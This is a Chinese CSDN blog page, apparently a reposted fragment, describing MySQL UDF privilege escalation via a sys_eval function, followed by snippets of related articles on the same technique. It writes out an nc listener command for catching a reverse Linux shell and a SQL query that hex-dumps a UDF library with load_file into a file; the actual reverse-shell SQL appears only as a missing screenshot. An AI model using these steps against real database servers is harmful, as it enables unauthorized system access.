mysql udf安全_MySQL数据库UDF的安全问题利用

最新推荐文章于 2024-05-13 10:14:59 发布
最新推荐文章于 2024-05-13 10:14:59 发布
阅读量146 收藏
点赞数
文章标签: mysql udf安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_31119637/article/details/113327452
版权

查看下这个udf库所支持的函数

3421c58fdfda0863bc9a8b4a7055626f.png

创建函数并且查看是否创建成功,可以看到一个名叫sys_eval的UDF创建成功了。

dab4abb7d841aec596780c818ab93b8f.png

最后利用UDF执行更高权限的功能

剩下的就用这个UDF获得系统权限吧,提示可以用nc反弹,在自己的主机上执行nc -vv -l -p 12345,在数据库上执行一下sql语句

2f7c8270d8470f7a6d4a195eff33ca02.png

就可以成功反弹出linux shell了,再往下就。不过UDF的利用也有局限性,需要有MySQL库的操作权限,在mysql库下必须有func表;在skipgranttables开启的情况下,UDF会被禁止。

PS:mysqludf.so是我已有的一个库文件,利用它生成了udf.txt,执行以下sql语句即可

mysql> select hex(load_file('/usr/lib/mysqludf.so')) into outfile '/tmp/udf.txt';

Query OK, 1 row affected (0.04 sec)

推荐阅读:

0b1331709591d260c1c78e86d0c51c18.png

艾卜娜·加沙伊
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Linux利用UDF库实现Mysql提权
12-15
环境: os:linux(bt5)   database:mysql   简述: 通过自定义库函数来实现执行任意的程序,这里只在linux下测试通过,具体到windows,所用的dll自然不同。   要求:  在mysql库下必须有func表,并且在‑‑skip‑grant‑tables开启的情况下,UDF会被禁止;   过程: 得到插件库路径 找对应操作系统的udf库文件 利用udf库文件加载函数并执行命令 1,得到插件库路径 mysql> show variables like "%plugin%"; +---------------+-----------------------+ |
Mysql数据库UDF安全问题利用
weixin_33895016的博客
10-06 272
最近一直在休假,没有写博客,转眼十一还剩最后一天,时间真的很快。今天想谈谈数据库安全问题。 对于数据库安全问题,首先,重要的生成库千万不能放在公网上,一旦被******后果不堪设想,轻则数据丢失,重则被***(整库被打包导出),如果恰恰又以明文存储了用户的密码,那么就太可怕了,去年轰动一时的某几个大型网站的用户数据泄漏事件都是因为明文的方式存储了用户的密码。其次是大量的数据库弱口令问题存在...
【史上最全】MySQL数据库安全加固方案_mysql安全加固
最新发布
2401_84972580的博客
05-13 595
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
mysql udf安全_mysqlUDF引入的安全问题
weixin_34790081的博客
02-01 129
一个测试库,由于之前部署的时候没注意它有公网地址,因此密码也设得比较简单,直接把root密码设为123456,没想到很快就被扫描后登进去了,还建了一个用户,试图利用mysql udf取得机器系统权限。如下:108883 Query CREATE FUNCTION sys_eval RETURNS string SONAME'mysqludf.so'108883 Query CREATE...
mysql udf安全_mysql数据库udf提权
weixin_39607935的博客
02-17 113
mysql数据库udf提权UDF (user defined function),即用户自定义函数。通过添加新函数,对MySQL数据库的功能进行扩充,就像使用本地MySQL函数如 database() 或 version() 一样。mysql数据库udf提权步骤1. 在mysql>5.1版本,udf.dll应放置在mysql安装目录的lib\plugin下。在mysql<5.1版本,u...
MYSQL_UDF-5.0.rar_mysql udf_udf_udf mysql
09-23
MySQL UDF(User Defined Function)是MySQL数据库系统中的一种扩展机制,允许用户自定义函数以满足特定的计算或处理需求。这些自定义函数通常用C或C++编写,然后编译为动态链接库(DLL),供MySQL服务器调用。本...
lib_mysqludf_sys 的win版本dll库
12-01
lib_mysqludf_sys可能是MySQL用户定义函数(User-Defined Function, UDF)的一个实现,允许用户在MySQL数据库中自定义计算逻辑。 **关于lib_mysqludf_sys** lib_mysqludf_sys可能是一个扩展了MySQL功能的库,提供...
lib_mysqludf_sys
12-22
MySQL系统命令UDF——lib_mysqludf_sys详解》 MySQL是一种广泛使用的开源关系型数据库管理系统,其功能强大,灵活性高...通过正确地使用和管理,"lib_mysqludf_sys"能够成为提升数据库管理和自动化效率的有力工具。
mysql.zip_ROOT_mysql提权_udf_udf mysql_提权
09-19
提权用的 udf 得到root帐号可以用这个提权
CentOS 7.5 64下编译好的lib_mysqludf_sys.so
10-12
CentOS 7.5 64位下编译好的lib_mysqludf_sys.so,源文件在https://download.csdn.net/download/shaynerain/10715798,我博客 中有介绍怎么用
渗透测试:MySQL数据库UDF提权详解
Bossfrank的博客
06-30 2618
本文介绍了渗透测试的常规提权方法——MySQL UDF提权。全面详解了UDFUDF提权原理与提权过程。以vulhub靶机pWnOS2.0为例,详解了提权的过程。读者可根据本文进行复现学习。
MySQLUDF
shaoyiwenet的专栏
11-21 9598
最近用到MySQLUDF, 查了一下相关文献, 对用户用户实现function和Aggregate function的方法做个介绍.
mysql导出udf失败_mysql UDF提权踩坑经验分享
weixin_31733409的博客
02-08 310
UDF提权已经不是什么新鲜技术了,不过前段时间在搭靶场的时候又重温了一遍这个东西,期间遇到了个别之前没有注意过的“难题”今天跟大家分享一下。首先关注一下这个版本问题,大多数人会把mysql5.1带入写到文章里面,但实际上这个年代用5.1版本mysql的人已经是万里挑一的概率了,所以这次也是针对5.1以上版本来讲的。 因为我们的mysql在导入我们的udf文件的时候是从mysql安装目录下的lib/...
做题时对知识点的查漏补缺
weixin_42067304的博客
09-08 911
1.IP地址分类?(A,B,C,D类) 2.c++异常处理? 3.对比路由器,交换机可以提供更大的带宽和数据转发功能 4.类的常成员函数:函数返回类型 函数名(参数列表):const 5。 register int i = 0; printf("i = %d, &i = %p\n", i, &i); “寄存器变量通常储存在计算机内存中。如果幸运的话,寄存器变量储存在 CPU 的寄存器中,或者概括地说,储存在最快的可用内存中。与普通变量相比,访问和处理这些变量的速度更快。...
教你一些MySQL数据库入侵及防御方法
老班长的博客
09-05 5782
一、MySQL 信息收集 1、端口信息收集 MySQL 默认端口是 3306 端口,但也有自定义端口,针对默认端口扫描主要利用扫描软件进行探测,推荐使用: d47e62d2b349aca45e42305ed6714efbe5ed61d9iisputter,直接填写 3306 端口,IP 地址填写单个或者 C 段地址; d47e62d2b349aca45e42305ed6714efbe5ed...
【学习笔记】mysql 自带aes_encrypt()加密与aes_decrypt()解密及乱码问题解决
热门推荐
弱水提沧的博客
09-02 2万+
由于安全性要求,需要对用户敏感信息进行加密处理。因此使用到了mysql的自带AES加密解密方法。 其中使用的秘钥采用的静态常量注入的方式。 常量类及常量属性: 本次使用的mapper.xml方式,其他方式的话参考sql语句,也是可以达到一样的效果的。 插入加密字段: HEX( ) 函数将插入值转换为16进制 ${ }使用占位符将常量类中的静态常量加入,作为加密秘钥 AES_...
java.sql.BatchUpdateException: Incorrect string value: '\xD6\xD0\xB9\xFA\xB9\xA4...' for column 'con
ufwhtb的专栏
07-18 3462
java.io.IOException: java.sql.BatchUpdateException: Incorrect string value: '\xD6\xD0\xB9\xFA\xB9\xA4...' for column 'content' at row 1 at org.apache.gora.sql.store.SqlStore.flush(SqlStore.java:340
lib_mysqludf_sys_x64.dll
08-06
lib_mysqludf_sys_x64.dll是一个用于MySQL数据库的外部库文件。它是MySQL User-defined Function (UDF)的一部分,允许用户通过调用这个库文件中的函数来扩展MySQL服务器的功能。 lib_mysqludf_sys_x64.dll提供了...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值